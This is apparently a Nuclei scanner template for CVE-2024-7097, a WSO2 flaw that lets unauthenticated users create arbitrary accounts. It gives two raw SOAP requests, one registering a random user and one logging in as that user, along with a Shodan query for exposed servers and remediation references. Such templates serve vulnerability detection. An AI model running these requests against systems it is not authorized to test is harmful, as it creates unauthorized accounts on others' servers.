id: CVE-2024-7097
info:
name: WSO2 User Registration - Arbitrary Account Creation
author: iamnoooob,rootxharsh,pdresearch
severity: medium
description: |
The SOAP admin service in WSO2 products has a security vulnerability that allows the creation of new user accounts regardless of the self-registration configuration settings.
impact: |
Unauthenticated attackers can bypass self-registration restrictions to create arbitrary user accounts, potentially gaining unauthorized access to the WSO2 system and its resources.
remediation: |
Apply security patches from WSO2 as outlined in security advisory WSO2-2024-3574 to address the arbitrary account creation vulnerability.
reference:
- https://sec.vnpt.vn/2025/01/canh-bao-lo-hong-nghiem-trong-tren-nen-tang-xac-thuc-tap-trung-wso2-anh-huong-den-nhieu-co-quan-to-chuc-bo-ban-nganh/
- https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2024/WSO2-2024-3574/
classification:
epss-score: 0.25144
epss-percentile: 0.96286
metadata:
verified: true
max-request: 2
shodan-query: "WSO2 Carbon Server"
tags: cve,cve2024,wso2,intrusive,auth-bypass,vkev,vuln
variables:
username: "{{randstr_1}}"
password: "{{randstr_2}}"
flow: http(1) && http(2)
http:
- raw:
- |
POST /services/UserRegistrationAdminService.UserRegistrationAdminServiceHttpsSoap11Endpoint/ HTTP/1.1
Host: {{Hostname}}
SOAPAction: "urn:addUser"
Content-Type: text/xml
{{username}}
{{password}}
matchers:
- type: status
status:
- 202
internal: true
- raw:
- |
POST /services/AuthenticationAdmin HTTP/1.1
Host: {{Hostname}}
SOAPAction: ""
Content-Type: text/xml
{{username}}
{{password}}
matchers:
- type: word
words:
- "loginResponse"
- "true"
condition: and
# digest: 490a0046304402203650f1ee6be3261ffdee785e550ba503d19af5a089faee3c94fd6916141e3f7502202d90ddfd50449d19248bd7fe5e2c2976cf0548b8d1e14fb2eb8fcbcfb402f72e:922c64590222798bb761d5b6d8e72950